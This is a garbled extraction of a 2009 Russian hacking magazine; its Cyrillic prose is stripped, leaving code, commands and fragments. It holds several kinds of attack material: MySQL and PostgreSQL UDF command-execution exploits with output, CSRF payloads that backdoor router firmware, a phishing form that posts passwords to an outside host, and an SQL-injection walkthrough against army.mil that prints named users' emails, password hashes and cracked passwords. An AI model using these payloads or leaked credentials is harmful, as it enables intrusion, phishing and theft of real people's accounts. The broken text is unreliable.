5. (Ctrl+T), http://
vkontakte.ru/login.php .
6. , .

3
:
WINDOWS VISTA
:
, , ,
. - , - ,
:). , :
1.
2.
3.
4.
5.





/Start

, . XP,
,
.
, .
:).
,
:

7. - , , http://vkontakte.
ru/friend.php.
8. ( 20).
, . profile.php
.

5. Print Spooler/
. ,
.
6. Security Center/ , .
, . .

:).
, . /
defrag. ,
.
: , .
, , .
!
, HKEY_CURRENT_USER Control
PanelDesktop. MenuShowDelay
, 400 0. ,
:
!
. :).

1. Windows Defender
.
.
2. Computer Browser/ ,
,
. , .
3. Windows Update .

.
4. Windows Error Reporting Service/
/
. XP
-
:).
X 03 /123/ 09

039

>>

:

:
, , .
-
. (wget, curl,
fetch), .

1. , :
http://host.ru/dir1/dir2/dir3/file.tar.gz%00
wget: wget -O file.rar http://host.ru/dir1/dir2/dir3/
file.tar.gz%00

2. ,
, HTML-,
. : -
.
, -
BRED3.

BRED , notepad. !

: ,

(, IPOD)
:
, .
USB Switchblade (wiki.hak5.org/wiki/USB_Switchblade) .
Hak5 USB Switchblade, . ,

: Dump SAM (
Security Account Managera Windows), IE/Firefox Password Grabber (
),
VNC-, , . ,
.
( techniques):
1. Max Damage Technique. , : X:\Documents\logfiles ( X -)
.
2. Amish Technique. (hak5.
org/releases/2x02/switchblade/AMISH1.0-payload.rar)
. , , ,
autorun.inf, : UseAutoPlay=1. X:\Dump.
Ipod, aliveintheory.110mb.
com/IPODSWITCHBLADE.zip. : , Ipoda
.exe-. . hak5,
. ,
progstart.bat. !
X:\iPod_Config\Dump.

040

: wiki.hak5.
org/wiki/USB_Switchblade#Max_Damage_Technique.
,
Silivrenions Technique. XP SP 2, ,
( Windows
Wireless Zero Configuration, netcat ..). , ExeScript (hide-folder.com/overview/hf_7.html),

(.bat, .vbs .js, WSF, WSH, HTA) .
!

. ,

X 03 /123/ 09

>>

:
(, ..)
:
LFI, , - . ,
FreeBSD, , .
(CentOS, Linux),
? , ( , passwd)
.
, DVD:
import sys, httplib, urllib2, socket, time, re
# , , /etc/passed
Search = "root:"
#Verbose Mode On = 1
Verbose = 0
#
vulns = "http://packetstormsecurity.org/fuzzer/
dirTraversal.txt"
#
TTW = "2"
def main(host, path):
h = httplib.HTTP(host)
h.putrequest("HEAD", path)
h.putheader("Host", host)
h.endheaders()
okresp, reason, headers = h.getreply()

:
,
. , NMAP
. ?
? : (
TCP OPTIONS, ,
), .
.
. telnet-:
1. telnetrecon (computec.
ch/projekte/telnetrecon), telnet- (TCP
23) .
2. , , ASCII-:

return okresp, reason, headers.get("Server")


def getsource(line):
try:
source = urllib2.urlopen("http://"+line).read()
if Verbose == 1:
print "Source:,len(source)
if re.search(Search.lower(), source.lower())\
!= None:
print "\n[!] LFI:", line, "\n"
except(urllib2.HTTPError, urllib2.URLError), msg:
print "[-] Received Error:", msg
socket.setdefaulttimeout(10)
...
print "\n[+] Host:",host
print "[+] File:",x
print "[+] Search:",Search
print "[+] Time to wait:", TTW, "seconds"
print "[+] Server:", server
print "[+] Response:", okresp, reason
print "[+] Paths Loaded:",len(paths)
if Verbose == 1:
print "[+] Verbose Mode On\n"
else:
print "[+] Verbose Mode Off\n"

"253" DO [0xdf]
"37" Authentication option (RFC 2941)
"255" IAC-byte
"251" WILL [0xfb] z

TelnetRecon

255-253-37-255-251-255-251-255-253-92-39-255-253-255-253-255-251

Windows XP.
3. Telnet RFC 854.
:
"255" IAC-byte
X 03 /123/ 09

041

>>

SKVOZ

01

://

MOZILLA
FIREFOX (CLICKJACKING)

>> Brief
.
Clickjacking,
. (
),

-. , , clickjacking. ,
, :
Adobe Flash Player, Internet Explorer, Opera, Safari Firefox. , - ,
:
! Firefox
NoScript JS-

function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}

onclick=updatebox(event), .
, , Google Chrome.

>> Targets:
Google Chrome 1.0.154.43/Mozilla Firefox 3.0.5/IE 7.0
>> Exploit
http://seclists.org/bugtraq/2009/Jan/0268.html
>> Solution
Firefox ,
. - , Noscript. IE 8
XSSFilter, NoScript .
Opera .
ifrme, .
. inline-. opera:config,
IFrames ( ).

02
XSSFilter IE 8

042

FULL-DISCLOURE
MYSQL UDF-

>> Brief
.

.
.
MySQL User-Defined (UDF)
,
. .
X 03 /123/ 09

>>
raptor_udf2.c (0xdeadbeef.info/exploits/raptor_udf2.c).
, : -
.

(dybnamic-link library Windows) shared object (Unix/Linux-like)
load_file , , SQL-injection.
:
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
#
$ gcc -g -c raptor_udf.c
$ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_
udf.so raptor_udf.o lc
# ,
.so
$ mysql -u root -p
Enter password:
[...]
# - , ,
mysql:
mysql> use mysql;
# blob
mysql> create table foo(line blob);
#
mysql> insert into foo values(load_file('/home/raptor/
raptor_udf.so'));
# malicious-
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
mysql> create function do_system returns integer soname
'raptor_udf.so';
mysql> select * from mysql.func;
+-----------+-----+---------------+----------+
| name

| ret | dl

| type

+-----------+-----+---------------+----------+
| do_system |

2 | raptor_udf.so | function |

+-----------+-----+---------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.
raptor /tmp/out');
mysql> \! Sh
#
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon
),3(sys),4(adm)

, MySQL
5.x. ,
sys_eval, sys_exec. 1 0. ,

lib_mysqludf_sys, sys_exec sys_eval.
$ wget --no-check-certificate https://svn.sqlmap.org/
sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_
sys_0.0.3.tar.gz
$ tar xfz lib_mysqludf_sys_0.0.3.tar.gz
$ cd lib_mysqludf_sys_0.0.3
$ sudo ./install.sh
#
gcc -Wall -I/usr/include/mysql -I. shared lib_
mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so
MySQL UDF compiled successfully
$ mysql -u root -p mysql
Enter password:
[...]
mysql> SELECT sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)
# - ,
mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
|0|
+-----------------------------------+
1 row in set (0.02 sec)
mysql> exit
Bye
$ ls -l /tmp/test_mysql
rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_
mysql

>> Targets
MySQL 5.0+
>> Exploit

SQL-injection svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/
mysqludfsys/.
raptor


MySQL
. ,
(mysqludf.org).
( ),
lib_mysqludf_sys (mysqludf.org/lib_mysqludf_sys/index.php), :
sys_exec ex
sys_get
sys_set ,

X 03 /123/ 09

043

>>

AppArmor . WEB

>> Solution
, .
,
, AppArmor. , AppArmor
WEB-application . , , (DAC) (MAC). ,
. AppArmor:
sudo apparmor_status
[...]
1 processes have profiles defined.
0 processes are in enforce mode :
0 processes are in complain mode.
1 processes are unconfined but have a profile defined.
/usr/sbin/mysqld (5128)
$ mysql -u root -p mysql Enter password:
[...]
mysql> SELECT sys_eval('id');
+----------------+
| sys_eval('id') |
+----------------+
||
+----------------+
1 row in set (0.12 sec)

!
mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
| 32512 |
+----------------+
1 row in set (0.01 sec)
mysql> exit
Bye
# AppArmor:
$ sudo /etc/init.d/apparmor stop
Unloading AppArmor profiles : done.
$ sudo apparmor_status
[...]
0 processes have profiles defined.
0 processes are in enforce mode :

044


IOCTL

0 processes are in complain mode.


0 processes are unconfined but have a profile defined.
$ mysql -u root -p mysql
Enter password:
[...]
mysql> select sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)
mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
|0|
+----------------+
1 row in set (0.10 sec)

03

POSTGRESQL UDF

>> Brief
UDF .
UDF
- ( , ,
, ). PostgreSQL .
libc system(). ,
pgshell (leidecker.info/projects/pgshell.
shtml).
? SQL-injection:
/store.php?id=1; <Injection>

Postgree SQL 8.1 UDF . , :


CREATE FUNCTION system(cstring) RETURNS int AS '/lib/
libc.so.6', 'system' LANGUAGE 'C' STRICT.

, system() INT-,
X 03 /123/ 09

>>

HTTP

stdout-.
:
# ,
/store.php?id=1; CREATE TABLE stdout(id serial, system_
out text)
#
/store.php?id=1; CREATE FUNCTION system(cstring)
RETURNS int AS /lib/libc.so.6','system' LANGUAGE 'C'
STRICT -# -

/store.php?id=1; SELECT system('uname -a > /tmp/test')
# ,
system_out
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/
test'
#
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout
FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

Procedural Language
Function (PL/tcl, PL/pl, PL/python). , Postgree

.
# , PL/Python
/store.php?id=1; SELECT count(*) FROM pg_language WHERE
lanname=plpythonu
# ,
/store.php?id=1; CREATE LANGUAGE plpythonu
# , ,
Python
/store.php?id=1; CREATE FUNCTION proxyshell(text)
RETURNS text AS import os; return os.popen(args[0]).
read() LANGUAGE plpythonu
#
/store.php?id=1 UNION ALL SELECT NULL,
proxyshell(whoami), NULL OFFSET 1;--

PL/Perl:
# PL/Perl
SELECT count(*) FROM pg_language WHERE lanname=plperlu
X 03 /123/ 09

# CREATE FUNCTION
proxyshell(text) RETURNS text AS 'open(FD,"$_[0]
|");return join("",<FD>);' LANGUAGE plperlu
#
SELECT proxyshell(os command);

>> Targets
PostgreSQL 8.2/8.3/8.4
>> Exploits
http://milw0rm.com/sploits/2009-lib_postgresqludf_
sys_0.0.1.tar.gz
>> Solution
MySQL.

PGP DESKTOP 9.0.6


LOCAL
DENIAL OF SERVICE

04

>> Brief:

,
-, .
PGP
PGPwded.sys,
. ,
IOCTL (0x80022038):
Device Type: Custom Device Type: 0x8002, 32770
Transfer Type: METHOD_BUFFERED (0x0, 0)
Access Type: FILE_ANY_ACCESS (0x0, 0)
Function Code: 0x80E, 2062

, IOCTL /. ,
ioctl
( ,
, ).
command arg ,
,
. , -

045

>>


Google Dork GHDB
AXIS 70U Network Document Server

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e), ,
.
. , ,
,
.
: IOCTL-proxy
(orange-bat.com/code/ioctl-proxy.zip), kartoffel (kartoffel.reversemode.
com/downloads.php).

>> Targets
PGP Desktop 9.0.6 [Build 6060]
>> Exploits
http://www.evilfingers.com/
advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php.
>> Solution
.

05

, , ,
, (WEB-;
, ). , :
: AXIS
AXIS 70U Network Document Server
: XSS +
:
XSS:
http://[server]/user/help/help.shtml?<script>alert(
'XSS')</script>
http://[server]/user/help/general_help_user.shtml?<
script>alert('XSS')</script>

(user/help/help.shtml), :
http://[server]/user/help/help.shtml?/admin/this_
server/this_server.shtml

: Profense
Profense Web Application Firewall
: XSRF / XSS
:
,
OWASP .
, , WEB-, !
SSH/SNMP:

046
46

<img src=https://10.1.1.199:2000/ajax.
html?hostname=profense.mydomain.com&gateway=
10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max_src_
conn=100&max_src_conn_rate_num=100&max_src_conn_
rate_sec=10&blacklist_exp=3600&ntp=ntp.hacked.
com&timezone=CET&syslog=syslog.hacked.com&syslog_
ext_l=4&snmp_public=public&snmp_location=&contact=
admin%40mydomain.com&ftp_server=ftp.hacked.com&ftp_
port=21&ftp_login=user&ftp_passwd=password&ftp_
remote_dir=%2Fhijacked_log&scp_server=scp.hacked.
com&scp_port=22&scp_login=admin&scp_remote_
dir=%2Fhijacked_log&ftp_auto_on=on&scp_auto_
on=on&ssh_on=on&remote_support_on=on&action=configur
ation&do=save>
Apply new configurations:
<img src=https://10.1.1.199:2000/ajax.html?action=res
tart&do=core>

proxy:
<img src=https://10.1.1.199:2000/ajax.
html?vhost_proto=http&vhost=vhost.com&vhost_
port=80&rhost_proto=http&rhost=10.1.1.1&rho
st_port=80&mode_pass=on&xmle=on&enable_file_
upload=on&static_passthrough=on&action=add&do=save>

( ):
<img src=https://10.1.1.199:2000/ajax.
html?action=shutdown>

XSS:
https://10.1.1.199:2000/proxy.html?action=manage&ma
in=log&show=deny_log&proxy=><script>alert(document.
cookie)</script>

: DLINK
D-link VoIP Phone Adapter
: + XSS
:
CSRF- :
<html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Upda
te?16640,0,0,0,0,0,0,0,0" method="POST">
<input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10">
<input name="TFTPServerAddress2" value="1">
<input name="TFTPServerAddress3" value="1">
<input name="TFTPServerAddress4" value="1">
<input name="FirmwareUpdate"
value="enabled">
<input name="FileName" value="backdoored_firmware.
img">
<input type=submit value="attack">
</form>
</html>

.
XSS:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscri
X 03 /123/ 09

>>
pt%3Ealert(%22hacked%22)%3C/script%3E

: 3COM
3Com OfficeConnect Wireless Cable/DSL Router
:
:
,
. - .

CGI-. , (System Tools
Configuration Backup Configuration). , , ,
, (config.bin).
, , , ,
wifi-, snmp- .
http://<IP>/SaveCfgFile.cgi

config.bin:
pppoe_username=xxxxxxxxxxxxxxx
pppoe_password=xxxxxxxxx
pppoe_service_name=xxxxxxxxx
[...]
mradius_username=xxxxxx
mradius_password=xxxxxx
mradius_secret=xxxxxxx
[...]

Remote
Administration:
http://www.securityfocus.com/archive/1/500762/30/0/threaded.
: CISCO
CISCO IOS
: XSRF/XSS
:
HTTP-:
furchtbar#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
furchtbar#sh ip int br | i up
FastEthernet0/0 192.168.1.2 YES NVRAM
up up

XSS:
http://192.168.1.2/level/15/exec/-/"><body
onload=alert("bug")>
http://192.168.1.2/level/15/exec/-/"><iframe onload = alert
("bug")>
http://192.168.1.2/exec/"><body onload="alert('bug');">

CSRF ( ):

http://192.168.1.2/level/15/exec/-/"><body onload=window.
location ='http://192.168.1.2/level/15/configure/-/hostname
/BUGGY/CR'>

:
Digital Security Research Group [DSecRG],
BinaryVision, Luca Carettoni (luca.carettoni[at]ikkisoft[dot]com). z
X 03 /123/ 09

47

>>
SKVOZ

ARMY.MIL

WEB-
. , .
?
. .
z
Army.mil.
, Zone-h.
org,
.
( ), ( , ),
( ).
, ,
katharsis
( US Army HACK katharsis.
bplaced.net/armyhack.htm). (cpma.apg.army.mil, 2rotc.
army.mil) 2000 Crime boys.
, ,
soa.mdw.army.mil, mdw.army.mil, mdwweb.
mdw.army.mil spiritofamerica.mdw.army.mil.
, .

!
.
:
http://www4.army.mil/otf/story.php?id=1
http://www4.army.mil/otf/story.php?id=-31337

, SQL-injection

048

Web Application Security Consortium.


,
:
import os, sys, httplib
#
p = 'http://www4.army.mil/otf/story.php?id=1+AND+1=2+U
NION+SELECT+'
def find(host, p):
try: # 0,1,2,3,4
for i in range(50):
colls = p+str(i)+','
#
h = httplib.HTTP(host)
h.putrequest('GET', colls)
h.putheader('Accept', 'text/html')
h.putheader('Accept', 'text/plain)
h.endheaders()
errcode, errmsg, headers = h.getreply()
if errcode==200:
print cools
except:
pass
find(p)

:
X 03 /123/ 09

>>

SQL-injection

http://www4.army.mil/otf/story.php?id=1+AND+
1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,1
2,13,14,15--

, SELECT.
, . ,
.
:

, , :
http://www4.army.mil/otf/story.php?id=1+AND+
1=2+UNION+SELECT+0,1,concat(user(),0x20,data
base(),0x20,version()),3,4,5,6,7,8,9,10,11,
12,13,14,15--

:
: otf_web_user@localhost
: otf
: 4.1.22-log

chris.clarke 4fe249b9a8080a4d405517a27fddb55
a chris.clarke1@us.army.mil
meghan.moran a21100b6490a2006ab94efa9580e987
6 moranm@fleishman.com
michael.katsufrakis fb4b04a6b48d626f4d8c25fb
1c3fcba2 michael.katsufrakis@us.army.mil
ryans aca2a6fcdc09c1699458fd55abcfcaf3 ryans@
fleishman.com
hayesn 717e17492ae4b0ec6d5aeb2d250fe442
hayesn@fleishman.com

dvd

700


.

!

: http://www4.army.mil/otf/admin/Login/login.php.
, ,
. ,
OTF (www4.army.mil/otf).
-, CMS
,
. , .
. MySQL 4.* . (information_schema)
5.*,
, users:


,
,
ARNEWS ( ).
, :
http://www4.army.mil/ocpa/read.php?story_id_
key=5061

:
http://www4.army.mil/otf/story.php?id=1+AND+
1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,1
2,13,14,15+FROM+users ()

.
:
http://www4.army.mil/otf/story.php?id=1+AN
D+1=2+UNION+SELECT+0,1,count(user_username)
,3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+users
(, 5 )
http://www4.army.mil/otf/story.php?id=
1+AND+1=2+UNION+SELECT+0,1,concat(user_
username,0x20,user_pw,0x20,user_email),3,4,
5,6,7,8,9,10,11,12,13,14,15+FROM+users+LIMI
T+1,2

http://www4.army.mil/otf/speech.php?story_
id_key=9859+AND+1=2+UNION+SELECT+0,1,2,3,conca
t(database(),0x20,%20user()),5,6,7,8,9,10,11- http://www4.army.mil/otf/speech.php?story_
id_key=9859+AND+1=2+UNION+SELECT+0,1,2,3,con
cat(user_username,0x20,user_pw,0x20,user_ema
il),5,6,7,8,9,10,11+FROM+users

, :
database: ocpa
user: OCPAuserbasic@localhost

:
[0] zack.kevit:04dac8afe0ca501587bad66f6b5ce5ad:

, LIMIT X 03 /123/ 09

zack.kevit@l-3com.com:zack.kevit@l-3com.com:

049

>>

, .
,

! ,
system_all. ,

[2] patricia.downs:5c6af66e2e7e5fe23c434b3f5c4ec2bf:patricia.
downs@smc.army.mil:
[3] laura.defrancisco:c8b1b73225e5896e06c19b1f609dc863:laura.
defrancisco@hqda.army.mil:
[4] robbie.thompson:b6917881d58688ad396501f773b5d647:robbie.
thompson@l-3com.com:
[5] ashley.stetter:ea13ba548da671076ec1a3a03cbd2a40:ashley.
stetter@hqda.army.mil:
[6] kerry.meeker:c8b1b73225e5896e06c19b1f609dc863:kerry.
meeker@hqda.army.mil:
[7] david.hamric:55231502f554ef71faa789d1a135866a:david.

, ,
(junior) (system_all)

hamric@l-3com.com:
[8] will.brall:cb7cd4c336c25560286fe69b55335325:will.brall@

[15] deepa.mahendru:5782db43cea274ab2e45c4f36318aea0:deepa.

us.army.mil:

mahendru@l-3com.com:

[9] assignment.desk:4a29dd4f50d00f8e84480238e4cb3ff0:

[16]michael.rautio:f956f3f32257f69b4bd165336a9c7869:michael.

assignmentdesk@smc.army.mil:

rautio@smc.us.army.mil:michael.rautio@smc.us.army.mil:

[10] michael.katsufrakis:fb4b04a6b48d626f4d8c25fb1c3fcba2:
michael.katsufrakis@us.army.mil:
[11] victor.harris:f9bbe1e289e380058aa0dc0500e216ce:victor.
harris@us.army.mil:
[12] emma.dozier:c6e6c426dbc367dfdbfea3d070b5acc3:emma.
dozier@smc.army.mil:
[13] chris.clarke1:e7ea3d9b4e0ea932fbdea34f2b56ed77:chris.
clarke1@us.army.mil:
[14] jacques.bannamon:2928789921c530d855f395bddf87536f:
jacques.bannamon@smc.army.mil:

. ,
().
: H = Llog2N=L logN/log2, L , N .
, ottomotto, L=9, N=26 (
). , , , 4.9 ,
. , N=94 (
ASCII) 6.55.
, :
b6917881d58688ad396501f773b5d647:7779311
obbie.thompson:b6917881d58688ad396501f773b5d647:
robbie.thompson@l-3com.com:
login: obbie.thompson
pass: 7779311
04dac8afe0ca501587bad66f6b5ce5ad:hellokitty
zack.kevit:04dac8afe0ca501587bad66f6b5ce5ad:zack.
kevit@l-3com.com:zack.kevit@l-3com.com:
login: zack.kevit
pass: hellokitty

.
. .
,
, 19 . : http://www4.army.mil/ocpa/admin.
, . ,

050

X 03 /123/ 09

>>

OTF. LIMIT
CMS
ARNEWS
- , .


,
SQL-injection
. - , .
. ,
HEAD- .
,
. , robots.txt ( ,
, ). sqlite,
.
import os, sys, sqlite3, httplib, re, locale
# -*- coding: utf-8 -*import thread, sqlite3
# ,
dires = []
#
HEAD
def check(host, p):
try:
h = httplib.HTTP(host)
h.putrequest('HEAD', p)
h.putheader('Host', host)
h.putheader('Accept', 'text/html')
h.putheader('Accept', 'text/plain')
h.endheaders()
errcode, errmsg, headers = h.getreply()
if (errcode==200) and (len(headers)!=0):
dires.append(p)
except:
pass
# robots.txt,
, , :
def robots(host):
global dires
try:
f = urllib.urlopen('http://'+host+'/robots.txt)
line = f.read()
txt = re.findall('Disallow: (.*)$', str(line),
re.MULTILINE)
for i in txt:
if i=='/' or i=='/\r':
pass
else:
X 03 /123/ 09

dires.append(i)
except IOError:
pass
# ,

def dirs(host):
global dires
conn = sqlite3.connect('db')
c = conn.cursor()
c.execute('SELECT * FROM Directories')
for row in c:
thread.start_new_thread(check,(host, row[1]))
thread.start_new_thread(robots, (host,))
# python-:

list(set(dires))
#
locale.setlocale(locale.LC_ALL, '')
tmp = [x.swapcase() for x in list(set(dires))]
tmp.sort(key=locale.strxfrm)
tmp = [x.swapcase() for x in tmp]
return tmp
dirs('army.mil')

, OWSP
Dirbuster ( ettee). , JAVA.
( , WEB-). owasp.org/index.php/Category:
OWASP_DirBuster_Project. : java
-jar DirBuster-0.12.jar -H -u https://127.0.0.1/ ( )
java -jar DirBuster-0.12.jar -u https://127.0.0.1/ (GUI).
? ,
200 , , ,
,
.
, , , , .
(
1273819 ).


,
, . ,
,
.
. z

051

>>
S4AVRD0W
/ S4AVRD0W@P0C.RU /


CMS EZ PUBLISH
CMS

, web- . ,
.
, .

. ,

.
mod_rewrite, server-side .
, SQL-
. .
, HTML-
: content="eZ publish".
, , , Open source
CMS eZPublish. . /ezinfo/about, CMS .
eZPublish 3.9.3.
CMS
( ).
eZPublish, , , (privilege escalation). . ,
, ,
, .
.

052

, CMS, , , white-box. All-In-One ,


Next.
.
.


, ,
- .
, , ,
.
.
, web-shell, CMS ( PHP).
.
, , , .
.htaccess
web-, :

X 03 /123/ 09

>>

info

CMS

...
<FilesMatch ".">
order allow,deny
deny from all
</FilesMatch>
<FilesMatch "(index\.php|\
.(gif|jpe?g|png|css|js|html)|var(.+)storage.
pdf(.+)\.pdf)$">
order allow,deny
allow from all
</FilesMatch>
RewriteEngine On
RewriteRule !\.(gif|jpe?g|png|css|js|html)|v
ar(.+)storage.pdf(.+)\.pdf$ index.php
...

-
web- .
. -,
X 03 /123/ 09


, . -,
web-shell ( ).

. CMS, ,
web-.
- : ,
.
eZPublish
advisory, . ,
,
. , .
, .
OWASP WebScarab (, !) ,
.

,
/user/success, ,

e-mail. ! SMTP ,
. ,
, ,
.

WebScarab, ,
. ,


web-
white-box


.
mktime()

Unix,
,


/
Unix
(The Unix Epoch, 1
1970 ).

warning

! ,


!

053

>>

ZERO-DAY
,
. :
...
if( $type == EZ_USER_PASSWORD_HASH_MD5_USER )
{
$str = md5( "$user\n$password" );
}
...

, .
, ,
UserId, ezuser .
,
CMS. , .
, , , :
. ,
? ! , ,

.
SMTP- CMS POST-

. ,
.
, CMS
.
. ,
, ,
, .
, , target-
( ). ,
.
CMS.

054

, .
, ,
.
, ,
, (
). , , InsidePro Password Pro

.
, , :
...
// Create enable account hash and send it to the newly
registered user
$hash = md5( mktime( ) . $user->attribute(
'contentobject_id' )
...

, mktime( ) , web-.
contentobject_id ,
. , eZPublish,
.
HTTP, , .
,
CMS .
, eZPublish .


, , eZPublish PHP? , CMS
X 03 /123/ 09

>>

eZPublish

dvd

poc-
,
.

. , : .
, , . , PHP-
CMS. . eZPublish,
.
eZPublish,

.
ezpkg. zip,

ezpkg. , ,
( , PHP),
package.xml.
eZPublish,
web- CMS , - ,
. ,
.htaccess, FilesMatch RewriteEngine. ,
X 03 /123/ 09

apache AllowOverride None, FilesMatch


.htaccess .

xml, . (Path traversal),
package.xml. ,
web- , ,
ezinfo.php.
, ,
. web-. apache,

, ,
web-.

.

SQL-, File-
web. ,
. . ! z

055

>>
D0ZNP
/ HTTP://OXOD.RU /

APPLE IPHONE

. Apple Apple iPhone. , , !


, .
Unix based, darwin kernel! .

IPHONE 3G: , !
, Apple
iPhone 3g. : GSM- 3g, A-GPS
. ,
, . ,
. , - ( 2.2).
SDK, - Apple Store.
,

056

. ,
.
iPhone
WinPWN.

Installer ( 4- ) Cydia ( Debian package).
, ,
Apple Store. Installer Cydia ,
.
X 03 /123/ 09

>>

SQL-injection

iframe src

0. SSHD DEFAULT
. , :
iPhone SSH-, , . , , iPhone
tunnel, USB network. SSHD, ( ). /etc/master.
passwd:

. , :)
alpine. ,
-, iPhone
22 : mobile/alpine root/alpine. ? ,
, . ,
. : ,
(
). ,
iPhone 3g , 22
.

##

1. INSTALLER REPOSITORY SPOOFING

# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/
false
root:/smx7MYTQIi2M:0:0::0:0:System

Administrator:/var/

root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/
bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/
false
_mdnsresponder:*:65:65::0:0:mDNSResponder:/var/empty:/usr/
bin/false

,
Installer RipDev. ,
- (,
httpd busybox).
DNS- IP- - ( busy box). iPhone-,
(
- Godlen_Wifi :))
, . xml- zip- . ,
. , !
:

_sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/

http://i.ripdev.com/seed/repo-r1050.zip

usr/bin/false
_unknown:*:99:99::0:0:Unknown
false
X 03 /123/ 09

User:/var/empty:/usr/bin/

, -

057

>>
- date version ,
. xml-
url:

. ,
Installer. http://i.ripdev.com/
info/index-2.2.plist, , , :
<dict>
<key>category</key>
<string>System</string>
<key>date</key>
<string>1232132864</string>
<key>identifier</key>
<string>com.ripdev.install</string>
<key>name</key>
<string>Installer</string>
<key>version</key>
<string>4.0</string>
<key>description</key>
<string>THE Installer. Now with resumeable downloads,
optimized and tested for 2.1 and 2.2, rebuilds installed
apps on the fly, supports proxies, Lua scripting language
and more!
Final release. Includes English, Russian and Ukranian
localizations.
</string>
<key>icon</key>
<string>http://i.ripdev.com/info/icons/com.ripdev.
install-4.0.png</string>
<key>url</key>
<string>http://i.ripdev.com/info/com.ripdev.install4.0-2.2.plist</string>
</dict>

, -

058

<?xml version="1.0" encoding="UTF-8"?>


<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//
EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>identifier</key>
<string>com.ripdev.install</string>
<key>name</key>
<string>Installer</string>
<key>version</key>
<string>4.0</string>
<key>description</key>
<string>THE Installer. Now with resumeable downloads,
optimized and tested for 2.1 and 2.2, rebuilds installed
apps on the fly, supports proxies, Lua scripting language
and more!
Final release. Includes English, Russian and Ukranian
localizations.
</string>
<key>icon</key>
<string>http://i.ripdev.com/info/icons/com.ripdev.
install-4.0.png</string>
<key>size</key>
<integer>565635</integer>
<key>hash</key>
<string>3d916b3d60c5c31c66e652f2c5711832</string>
<key>location</key>
<string>http://i.ripdev.com/packages/System/installer40.zip</string>
</dict>
</plist>

version ,
. size,
. hash.
regenerate.php:
$r['hash'] = md5_file($fullpath);

, , . - . , url- . , .
, iPhone , .

2. EXPLOITS
- Safari .
MacOs. .
libtiff,
. javascript-. , :
WebKit , iPhone ,
.
iPhone. -,
. -, . :
http://www.iphoneworld.ca/exploits/crash-my-iphone.
html
X 03 /123/ 09

>>
, , , ,
, html-
iPhone. , html-:
<a href=http://google.ru>http://yandex.ru</a>

, . http://yandex.ru, ,
, http://google.ru. , e-mail
, : http://yandex.
ru,
. .
, . ,
<a href="%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%72
%75">http://yandex.ru</a>

,
. http://:
<a
href="http://%67%6F%6F%67%6C%65%2E%72%75">http://
yandex.ru</a>

AppleStore

http://www.iphoneworld.ca/exploits/iphone-crash.html

( ) 2.2.
-.
(http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybeyours.html), ( , )
- iPhone. , H.D.Moore,
, .
, 25 2007 !
( ) .
,
Safari. - : ;).

3. FISHING/XSS
, ,
: iPhone,
XSS. , , . , .
,
iPhone,
.
, ,
- .
, , . X 03 /123/ 09

,
. ,
. ,
title alt. ,
, AppleStore ( , , )
iframe . ,
HTML-. Safari
, , ,
. , :
<?php
$fish='
<html>
<body bgcolor="white">
<form method="GET" action="http://creditmne.ru/x/f/
i.php" name="fakeform" id="fakeform" width="278">
<tableborder="0"style="width:278px;height:175px;paddin
g-top:0px;padding-right:0px;padding-left:0px;paddingbottom:0px" width="278" height="175" cellpadding="0"
cellspacing="0">
<tr width="278">
<td colspan="4">
<img src="r11.gif" width="278" height="78"/>
</td>
</tr>
<tr width="278">
<td width="8" colspan="1">
<img src="r21.gif" border="0" width="8" height="30"/>
</td>
<td colspan="2" width="0">
<input type="password" style="width:262;height:30"
name="fpass" value="">
</td>
<td width="8" colspan="1">
<img src="r23.gif" style="margin-left:-115px"
border="0" width="8" height="30"/>
</td>
</tr>
<tr >

059

>>

info


AppleStore
javascript:
prompt('user@
yahoo.com').

,

iTunes ,

javascript.

DNS-.

links
http://www.
skyhookwireless.com

MAC-

.
http://blog.metasploit.
